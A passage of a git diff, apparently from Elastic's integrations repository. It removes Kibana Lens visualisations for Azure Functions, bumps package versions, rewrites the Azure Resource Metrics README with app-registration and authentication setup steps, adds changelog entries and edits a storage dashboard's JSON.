- } - }, - "title": "Response time", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-08-13T19:12:36.830Z", - "id": "azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-59e32faf-6efe-4b99-806e-0022e95bfe71", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0b109d13-9358-4287-8292-7924e980f073", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/azure_functions/kibana/lens/azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b.json b/packages/azure_functions/kibana/lens/azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b.json
deleted file mode 100644
index 7540ae1ae4f..00000000000
--- a/packages/azure_functions/kibana/lens/azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b.json
+++ /dev/null
@@ -1,147 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "5e26da41-85b9-4f3d-b666-9b027f19f4c0": { - "columnOrder": [ - "e3e826ac-4145-4caa-97c7-0074740c3bde", - "4d55692b-10e3-4d58-8bc0-2973e9d8bd58", - "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" - ], - "columns": { - "4d55692b-10e3-4d58-8bc0-2973e9d8bd58": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e3e826ac-4145-4caa-97c7-0074740c3bde": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "f807ce10-f26f-4f0a-a838-2baea3bb5ac2", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "f807ce10-f26f-4f0a-a838-2baea3bb5ac2": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.bytes_received.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.bytes_received.total" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"azure.function\" " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", 
- "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" - ], - "layerId": "5e26da41-85b9-4f3d-b666-9b027f19f4c0", - "layerType": "data", - "seriesType": "line", - "splitAccessor": "e3e826ac-4145-4caa-97c7-0074740c3bde", - "xAccessor": "4d55692b-10e3-4d58-8bc0-2973e9d8bd58" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "Bytes Received", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-08-25T08:51:40.052Z", - "id": "azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5e26da41-85b9-4f3d-b666-9b027f19f4c0", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/azure_functions/manifest.yml b/packages/azure_functions/manifest.yml index b094e9af604..2907f4891b4 100644 --- a/packages/azure_functions/manifest.yml +++ b/packages/azure_functions/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_functions title: "Azure Functions" -version: "0.2.0" +version: "0.4.0" source: license: "Elastic-2.0" description: "Get metrics and logs from Azure Functions" @@ -11,7 +11,7 @@ categories: - cloud conditions: kibana: - version: "^8.8.1" + version: "^8.12.0" elastic: subscription: "basic" vars: diff --git a/packages/azure_metrics/_dev/build/docs/README.md b/packages/azure_metrics/_dev/build/docs/README.md index 46de068f5f5..28a4dab77c4 100644 --- a/packages/azure_metrics/_dev/build/docs/README.md +++ b/packages/azure_metrics/_dev/build/docs/README.md 
@@ -2,56 +2,187 @@ The [Azure Monitor](https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/data-platform-metrics) feature collects and aggregates logs and metrics from a variety of sources into a common data platform where it can be used for analysis, visualization, and alerting. -The azure monitor metrics are numerical values that describe some aspect of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. +The Azure Resource Metrics will periodically retrieve the Azure Monitor metrics using the Azure REST APIs as MetricList. Additional Azure API calls can be used to retrieve information regarding the resources targeted by the user. -The Azure Resource Metrics will periodically retrieve the azure monitor metrics using the Azure REST APIs as MetricList. -Additional azure API calls will be executed in order to retrieve information regarding the resources targeted by the user. +## Data streams + +The Azure Resource Metrics collects one type of data: metrics. + +**Metrics** are numerical values that describe some aspects of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. + +The following data streams are available: + +**`monitor`** - Allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, +aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. + +**`compute_vm`** - Collects metrics from the virtual machines, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm` should be `300s` or multiples of `300s`. 
-## Integration specific configuration notes +**`compute_vm_scaleset`** - Collects metrics from the virtual machine scalesets, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm_scaleset` should be `300s` or multiples of `300s`. + +**`storage_account`** - Collects metrics from the storage accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `storage_account` should be `300s` or multiples of `300s`. + +**`container_instance`** - Collects metrics from specified container groups, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_instance` should be `300s` or multiples of `300s`. + +**`container_registry`** - Collects metrics from the container registries, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_registry` should be `300s` or multiples of `300s`. -All the tasks executed against the Azure Monitor REST API will use the Azure Resource Manager authentication model. -Therefore, all requests must be authenticated with Azure Active Directory (Azure AD). -One approach to authenticate the client application is to create an Azure AD service principal and retrieve the authentication (JWT) token. -For a more detailed walk-through, see: +**`container_service`** - Collects metrics from the container services, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_service` should be `300s` or multiples of `300s`. + +**`database_account`** - Collects relevant metrics from specified database accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `database_account` should be `300s` or multiples of `300s`. + +For each individual data stream, you can check the exported fields in the [Metrics reference](#metrics-reference) section. 
+ +## Requirements + +The Elastic Agent fetches metric data from the Azure Monitor API and sends it to dedicated data streams named `azure-monitor.-default` in Elasticsearch. + +```text + ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ + + │ ┌─────────────────┐ │ +┌─────────────────┐ │ azure-monitor │ ┌─────────────────┐ +│ Azure API │◀───┼──│ <> │──┼───▶│ Elasticsearch │ +└─────────────────┘ └─────────────────┘ └─────────────────┘ + │ │ + ─ Elastic Agent ─ ─ ─ ─ +``` + +Elastic Agent needs an App Registration to access Azure on your behalf to collect data using the Azure APIs programmatically. + +To use this integration you will need: + +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. See more details in the [Setup section](#setup). +* **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. + + +### Authentication and costs + +**Authentication on the Azure side** +All the tasks executed against the Azure Monitor REST API use the Azure Resource Manager authentication model. Therefore, all requests must be authenticated with Microsoft Entra. +To authenticate the client application, create a Microsoft Entra service principal and retrieve the authentication (JWT) token. For more details, check the following procedures: * [Create an Azure service principal with Azure PowerShell](https://docs.microsoft.com/en-us/powershell/azure/create-azure-service-principal-azureps?view=azps-2.7.0.) -* [Use the portal to create an Azure AD application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). 
+* [Use the portal to create a Microsoft Entra application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). + +NOTE: When you create an Azure service principal with Azure PowerShell, a linked App Registration is automatically created and is visible on the Azure portal. + +Make sure that the roles assigned to the application contain at least reading permissions to the monitor data. Check [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles) for more details. -Users will have to make sure the roles assigned to the application contain at least reading permissions to the monitor data. See: [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). +**Authentication on the Elastic side** +Elastic handles authentication by creating or renewing the authentication token. It is recommended to use dedicated credentials for Metricbeat only. -Required credentials for the `azure` resource metrics integration: +**Costs** +Metric queries are charged based on the number of standard API calls. +Check [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/) for more detailsgit. -`client_id`:: The unique identifier for the application (also known as Application Id) +## Setup -`client_secret`:: The client/application secret/key +To start collecting data with this integration, you need to: +- Register a new Azure app, by adding credentials, and assigning roles. +- Specify the integration settings in Kibana, which will determine how the integration will access the Azure APIs. 
-`subscription_id`:: The unique identifier for the azure subscription +### Register a new Azure app -`tenant_id`:: The unique identifier of the Azure Active Directory instance +To register your app, follow these steps: +**Step 1: Create the app registration** -The azure credentials keys can be used if configured `AZURE_CLIENT_ID`, `AZURE_CLIENT_SECRET`, `AZURE_TENANT_ID`, `AZURE_SUBSCRIPTION_ID` +1. Sign in to the [Azure Portal](https://portal.azure.com/). +2. Search for and select **Microsoft Entra ID**. +3. Under **Manage**, select **App registrations** > **New registration**. +4. Enter a display _Name_ for your application (for example, "elastic-agent"). +5. Specify who can use the application. +6. Don't enter anything for _Redirect URI_. This is optional and the agent doesn't use it. +7. Select **Register** to complete the initial app registration. + +Take note of the **Application (client) ID**, which you will use later when specifying the **Client ID** in the integration settings. + +**Step 2: Add credentials** + +Credentials allow your application to access Azure APIs and authenticate itself, requiring no interaction from a user at runtime. + +This integration uses Client Secrets to prove its identity. + +1. In the [Azure Portal](https://portal.azure.com/), select the application you created in the previous section. +1. Select **Certificates & secrets** > **Client secrets** > **New client secret**. +1. Add a description (for example, "Elastic Agent client secrets"). +1. Select an expiration for the secret or specify a custom lifetime. +1. Select **Add**. + +Take note of the content in the **Value** column in the **Client secrets** table, which you will use later when specifying a **Client Secret** in the integration settings. **This secret value is never displayed again after you leave this page.** Record the secret's value in a safe place. + +**Step 3: Assign role** + +1. 
In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. +1. Select the subscription to assign the application. +1. Select **Access control (IAM)**. +1. Select **Add** > **Add role assignment** to open the _Add role assignment page_. +1. In the **Role** tab, search and select the role **Monitoring Reader**. +1. Select the **Next** button to move to the **Members** tab. +1. Select **Assign access to** > **User, group, or service principal**, and select **Select members**. This page does not display Microsoft Entra applications in the available options by default. +1. To find your application, search by name (for example, "elastic-agent") and select it from the list. +1. Click the **Select** button. +1. Then click the **Review + assign** button. + +Take note of the following values, which you will use later when specifying settings. + +* `Subscription ID`: use the content of the "Subscription ID" you selected. +* `Tenant ID`: use the "Tenant ID" from the Microsoft Entra you use. + +Your App Registration is now ready for the Elastic Agent. + +### Specify the integration settings in Kibana + +Add the Azure Resource Metrics integration in Kibana and specify settings. + +If you're new to integrations, you can find step-by-step instructions on how to set up an integration in the {{ url "getting-started-observability" "Getting started" }} guide. + +The settings' main section contains all the options needed to access the Azure APIs and collect the monitoring data. You will now use all the values from [App registration](#app-registration) including: + +`Client ID` _string_ +: The unique identifier of the App Registration (sometimes referred to as Application ID). + +`Client Secret` _string_ +: The client secret for authentication. + +`Subscription ID` _string_ +: The unique identifier for the Azure subscription. You can provide just one subscription ID. The Agent uses this ID to access Azure APIs. 
+ +`Tenant ID` _string_ +: The unique identifier of the Microsoft Entra Tenant ID. + +### Advanced options + +There are two additional advanced options: + +`Resource Manager Endpoint` _string_ +: Optional. By default, the integration uses the Azure public environment. To override, users can provide a specific resource manager endpoint to use a different Azure environment. -`resource_manager_endpoint` :: -_string_ -Optional, by default the azure public environment will be used, to override, users can provide a specific resource manager endpoint in order to use a different azure environment. Examples: -* https://management.chinacloudapi.cn for azure ChinaCloud -* https://management.microsoftazure.de for azure GermanCloud -* https://management.azure.com for azure PublicCloud -* https://management.usgovcloudapi.net for azure USGovernmentCloud - -`active_directory_endpoint` :: -_string_ -Optional, by default the associated active directory endpoint to the resource manager endpoint will be used, to override, users can provide a specific active directory endpoint in order to use a different azure environment. + +* `https://management.chinacloudapi.cn` for Azure ChinaCloud +* `https://management.microsoftazure.de` for Azure GermanCloud +* `https://management.azure.com` for Azure PublicCloud +* `https://management.usgovcloudapi.net` for Azure USGovernmentCloud + +` Microsoft Entra Endpoint` _string_ +: Optional. By default, the integration uses the associated Microsoft Entra Endpoint. To override, users can provide a specific active directory endpoint to use a different Azure environment. 
+ Examples: -* https://login.microsoftonline.com for azure ChinaCloud -* https://login.microsoftonline.us for azure GermanCloud -* https://login.chinacloudapi.cn for azure PublicCloud -* https://login.microsoftonline.de for azure USGovernmentCloud -## Data streams +* `https://login.chinacloudapi.cn` for Azure ChinaCloud +* `https://login.microsoftonline.de` for Azure GermanCloud +* `https://login.microsoftonline.com` for Azure PublicCloud +* `https://login.microsoftonline.us` for Azure USGovernmentCloud + +## Metrics reference - `monitor` +`monitor` This data stream allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. @@ -98,10 +229,3 @@ This data stream will collect relevant metrics from specified database accounts, so the `period` for `database_account` should be `300s` or multiples of `300s`. {{fields "database_account"}} - -## Additional notes about metrics and costs - -Costs: Metric queries are charged based on the number of standard API calls. -See: [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/). - -Authentication: We are handling authentication on our side (creating/renewing the authentication token), so we advise users to use dedicated credentials for metricbeat only. diff --git a/packages/azure_metrics/changelog.yml b/packages/azure_metrics/changelog.yml index 572dab3bd0f..7ebdf0ec4a6 100644 --- a/packages/azure_metrics/changelog.yml +++ b/packages/azure_metrics/changelog.yml 
@@ -1,3 +1,23 @@
+- version: "1.5.0"
+  changes:
+    - description: Update visualizations of Queue Storage Overview, Table Storage Overview, File Storage Overview & Storage Overview dashboards.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9502
+- version: "1.4.4"
+  changes:
+    - description: Migrate Blob Storage Overview dashboard to lens.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9503
+- version: "1.4.3"
+  changes:
+    - description: Remove suffix from Compute VMs Overview dashboard.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9445
+- version: "1.4.2"
+  changes:
+    - description: Apply documentation guidelines and add generic setup section to Azure Resource Metrics.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/9065
 - version: "1.4.1"
   changes:
     - description: Expand Azure guest metrics section.
diff --git a/packages/azure_metrics/docs/README.md b/packages/azure_metrics/docs/README.md
index e81177c0808..b7c32cc52d3 100644
--- a/packages/azure_metrics/docs/README.md
+++ b/packages/azure_metrics/docs/README.md
@@ -2,56 +2,187 @@ The [Azure Monitor](https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/data-platform-metrics) feature collects and aggregates logs and metrics from a variety of sources into a common data platform where it can be used for analysis, visualization, and alerting. -The azure monitor metrics are numerical values that describe some aspect of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. +The Azure Resource Metrics will periodically retrieve the Azure Monitor metrics using the Azure REST APIs as MetricList. Additional Azure API calls can be used to retrieve information regarding the resources targeted by the user. -The Azure Resource Metrics will periodically retrieve the azure monitor metrics using the Azure REST APIs as MetricList. -Additional azure API calls will be executed in order to retrieve information regarding the resources targeted by the user. +## Data streams + +The Azure Resource Metrics collects one type of data: metrics. + +**Metrics** are numerical values that describe some aspects of a system at a particular point in time. They are collected at regular intervals and are identified with a timestamp, a name, a value, and one or more defining labels. + +The following data streams are available: + +**`monitor`** - Allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, +aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. + +**`compute_vm`** - Collects metrics from the virtual machines, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm` should be `300s` or multiples of `300s`. 
-## Integration specific configuration notes +**`compute_vm_scaleset`** - Collects metrics from the virtual machine scalesets, these metrics will have a timegrain every 5 minutes, +so the `period` for `compute_vm_scaleset` should be `300s` or multiples of `300s`. + +**`storage_account`** - Collects metrics from the storage accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `storage_account` should be `300s` or multiples of `300s`. + +**`container_instance`** - Collects metrics from specified container groups, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_instance` should be `300s` or multiples of `300s`. + +**`container_registry`** - Collects metrics from the container registries, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_registry` should be `300s` or multiples of `300s`. -All the tasks executed against the Azure Monitor REST API will use the Azure Resource Manager authentication model. -Therefore, all requests must be authenticated with Azure Active Directory (Azure AD). -One approach to authenticate the client application is to create an Azure AD service principal and retrieve the authentication (JWT) token. -For a more detailed walk-through, see: +**`container_service`** - Collects metrics from the container services, these metrics will have a timegrain every 5 minutes, +so the `period` for `container_service` should be `300s` or multiples of `300s`. + +**`database_account`** - Collects relevant metrics from specified database accounts, these metrics will have a timegrain every 5 minutes, +so the `period` for `database_account` should be `300s` or multiples of `300s`. + +For each individual data stream, you can check the exported fields in the [Metrics reference](#metrics-reference) section. 
+ +## Requirements + +The Elastic Agent fetches metric data from the Azure Monitor API and sends it to dedicated data streams named `azure-monitor.-default` in Elasticsearch. + +```text + ┌ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ + + │ ┌─────────────────┐ │ +┌─────────────────┐ │ azure-monitor │ ┌─────────────────┐ +│ Azure API │◀───┼──│ <> │──┼───▶│ Elasticsearch │ +└─────────────────┘ └─────────────────┘ └─────────────────┘ + │ │ + ─ Elastic Agent ─ ─ ─ ─ +``` + +Elastic Agent needs an App Registration to access Azure on your behalf to collect data using the Azure APIs programmatically. + +To use this integration you will need: + +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. See more details in the [Setup section](#setup). +* **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. + + +### Authentication and costs + +**Authentication on the Azure side** +All the tasks executed against the Azure Monitor REST API use the Azure Resource Manager authentication model. Therefore, all requests must be authenticated with Microsoft Entra. +To authenticate the client application, create a Microsoft Entra service principal and retrieve the authentication (JWT) token. For more details, check the following procedures: * [Create an Azure service principal with Azure PowerShell](https://docs.microsoft.com/en-us/powershell/azure/create-azure-service-principal-azureps?view=azps-2.7.0.) -* [Use the portal to create an Azure AD application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). 
+* [Use the portal to create a Microsoft Entra application and service principal that can access resources](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal). + +NOTE: When you create an Azure service principal with Azure PowerShell, a linked App Registration is automatically created and is visible on the Azure portal. + +Make sure that the roles assigned to the application contain at least reading permissions to the monitor data. Check [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles) for more details. -Users will have to make sure the roles assigned to the application contain at least reading permissions to the monitor data. See: [Azure built-in roles](https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). +**Authentication on the Elastic side** +Elastic handles authentication by creating or renewing the authentication token. It is recommended to use dedicated credentials for Metricbeat only. -Required credentials for the `azure` resource metrics integration: +**Costs** +Metric queries are charged based on the number of standard API calls. +Check [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/) for more detailsgit. -`client_id`:: The unique identifier for the application (also known as Application Id) +## Setup -`client_secret`:: The client/application secret/key +To start collecting data with this integration, you need to: +- Register a new Azure app, by adding credentials, and assigning roles. +- Specify the integration settings in Kibana, which will determine how the integration will access the Azure APIs. 
-`subscription_id`:: The unique identifier for the azure subscription +### Register a new Azure app -`tenant_id`:: The unique identifier of the Azure Active Directory instance +To register your app, follow these steps: +**Step 1: Create the app registration** -The azure credentials keys can be used if configured `AZURE_CLIENT_ID`, `AZURE_CLIENT_SECRET`, `AZURE_TENANT_ID`, `AZURE_SUBSCRIPTION_ID` +1. Sign in to the [Azure Portal](https://portal.azure.com/). +2. Search for and select **Microsoft Entra ID**. +3. Under **Manage**, select **App registrations** > **New registration**. +4. Enter a display _Name_ for your application (for example, "elastic-agent"). +5. Specify who can use the application. +6. Don't enter anything for _Redirect URI_. This is optional and the agent doesn't use it. +7. Select **Register** to complete the initial app registration. + +Take note of the **Application (client) ID**, which you will use later when specifying the **Client ID** in the integration settings. + +**Step 2: Add credentials** + +Credentials allow your application to access Azure APIs and authenticate itself, requiring no interaction from a user at runtime. + +This integration uses Client Secrets to prove its identity. + +1. In the [Azure Portal](https://portal.azure.com/), select the application you created in the previous section. +1. Select **Certificates & secrets** > **Client secrets** > **New client secret**. +1. Add a description (for example, "Elastic Agent client secrets"). +1. Select an expiration for the secret or specify a custom lifetime. +1. Select **Add**. + +Take note of the content in the **Value** column in the **Client secrets** table, which you will use later when specifying a **Client Secret** in the integration settings. **This secret value is never displayed again after you leave this page.** Record the secret's value in a safe place. + +**Step 3: Assign role** + +1. 
In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. +1. Select the subscription to assign the application. +1. Select **Access control (IAM)**. +1. Select **Add** > **Add role assignment** to open the _Add role assignment page_. +1. In the **Role** tab, search and select the role **Monitoring Reader**. +1. Select the **Next** button to move to the **Members** tab. +1. Select **Assign access to** > **User, group, or service principal**, and select **Select members**. This page does not display Microsoft Entra applications in the available options by default. +1. To find your application, search by name (for example, "elastic-agent") and select it from the list. +1. Click the **Select** button. +1. Then click the **Review + assign** button. + +Take note of the following values, which you will use later when specifying settings. + +* `Subscription ID`: use the content of the "Subscription ID" you selected. +* `Tenant ID`: use the "Tenant ID" from the Microsoft Entra you use. + +Your App Registration is now ready for the Elastic Agent. + +### Specify the integration settings in Kibana + +Add the Azure Resource Metrics integration in Kibana and specify settings. + +If you're new to integrations, you can find step-by-step instructions on how to set up an integration in the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +The settings' main section contains all the options needed to access the Azure APIs and collect the monitoring data. You will now use all the values from [App registration](#app-registration) including: + +`Client ID` _string_ +: The unique identifier of the App Registration (sometimes referred to as Application ID). + +`Client Secret` _string_ +: The client secret for authentication. + +`Subscription ID` _string_ +: The unique identifier for the Azure subscription. You can provide just one subscription ID. 
The Agent uses this ID to access Azure APIs. + +`Tenant ID` _string_ +: The unique identifier of the Microsoft Entra Tenant ID. + +### Advanced options + +There are two additional advanced options: + +`Resource Manager Endpoint` _string_ +: Optional. By default, the integration uses the Azure public environment. To override, users can provide a specific resource manager endpoint to use a different Azure environment. -`resource_manager_endpoint` :: -_string_ -Optional, by default the azure public environment will be used, to override, users can provide a specific resource manager endpoint in order to use a different azure environment. Examples: -* https://management.chinacloudapi.cn for azure ChinaCloud -* https://management.microsoftazure.de for azure GermanCloud -* https://management.azure.com for azure PublicCloud -* https://management.usgovcloudapi.net for azure USGovernmentCloud - -`active_directory_endpoint` :: -_string_ -Optional, by default the associated active directory endpoint to the resource manager endpoint will be used, to override, users can provide a specific active directory endpoint in order to use a different azure environment. + +* `https://management.chinacloudapi.cn` for Azure ChinaCloud +* `https://management.microsoftazure.de` for Azure GermanCloud +* `https://management.azure.com` for Azure PublicCloud +* `https://management.usgovcloudapi.net` for Azure USGovernmentCloud + +` Microsoft Entra Endpoint` _string_ +: Optional. By default, the integration uses the associated Microsoft Entra Endpoint. To override, users can provide a specific active directory endpoint to use a different Azure environment. 
+ Examples: -* https://login.microsoftonline.com for azure ChinaCloud -* https://login.microsoftonline.us for azure GermanCloud -* https://login.chinacloudapi.cn for azure PublicCloud -* https://login.microsoftonline.de for azure USGovernmentCloud -## Data streams +* `https://login.chinacloudapi.cn` for Azure ChinaCloud +* `https://login.microsoftonline.de` for Azure GermanCloud +* `https://login.microsoftonline.com` for Azure PublicCloud +* `https://login.microsoftonline.us` for Azure USGovernmentCloud + +## Metrics reference - `monitor` +`monitor` This data stream allows users to retrieve metrics from specified resources. Added filters can apply here as the interval of retrieving these metrics, metric names, aggregation list, namespaces and metric dimensions. The monitor metrics will have a minimum timegrain of 5 minutes, so the `period` for `monitor` dataset should be `300s` or multiples of `300s`. @@ -631,10 +762,3 @@ so the `period` for `database_account` should be `300s` or multiples of `300s`. | service.address | Service address | keyword | | | service.type | The type of the service data is collected from. The type can be used to group and correlate logs and metrics from one service type. Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. | keyword | | - -## Additional notes about metrics and costs - -Costs: Metric queries are charged based on the number of standard API calls. -See: [Azure Monitor pricing](https://azure.microsoft.com/en-gb/pricing/details/monitor/). - -Authentication: We are handling authentication on our side (creating/renewing the authentication token), so we advise users to use dedicated credentials for metricbeat only. 
diff --git a/packages/azure_metrics/img/azure_metrics-storage-account-overview.png b/packages/azure_metrics/img/azure_metrics-storage-account-overview.png index 2ac54ab5068..922fee68b90 100644 Binary files a/packages/azure_metrics/img/azure_metrics-storage-account-overview.png and b/packages/azure_metrics/img/azure_metrics-storage-account-overview.png differ diff --git a/packages/azure_metrics/img/azure_metrics-vm-overview.png b/packages/azure_metrics/img/azure_metrics-vm-overview.png index 1b5422120d8..dc79a4bfa70 100644 Binary files a/packages/azure_metrics/img/azure_metrics-vm-overview.png and b/packages/azure_metrics/img/azure_metrics-vm-overview.png differ diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json index 43312596159..0e835d49e66 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc.json @@ -49,6 +49,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { "data": { "aggs": [], @@ -66,7 +67,7 @@ "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [**Queue**](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation Queue Storage Overview [Azure Metrics]", + "title": "Navigation Queue Storage Overview", "type": "markdown", "uiState": {} } 
@@ -79,6 +80,7 @@ "y": 0 }, "panelIndex": "933a427d-a8b7-48ff-ac53-337f32b340ea", + "title": "Navigation Queue Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -120,12 +122,12 @@ }, "isBucketed": false, "label": "Queue Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_capacity.avg" @@ -133,10 +135,10 @@ "9c38f7a6-3d0e-42ea-818e-c7b3503cac99": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.queue_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.queue_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.queue_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.queue_capacity.avg))", "isFormulaBroken": false }, "references": [ @@ -147,11 +149,15 @@ "9c38f7a6-3d0e-42ea-818e-c7b3503cac99X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.queue_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.queue_capacity.avg))", + "operationType": "last_value", "params": { 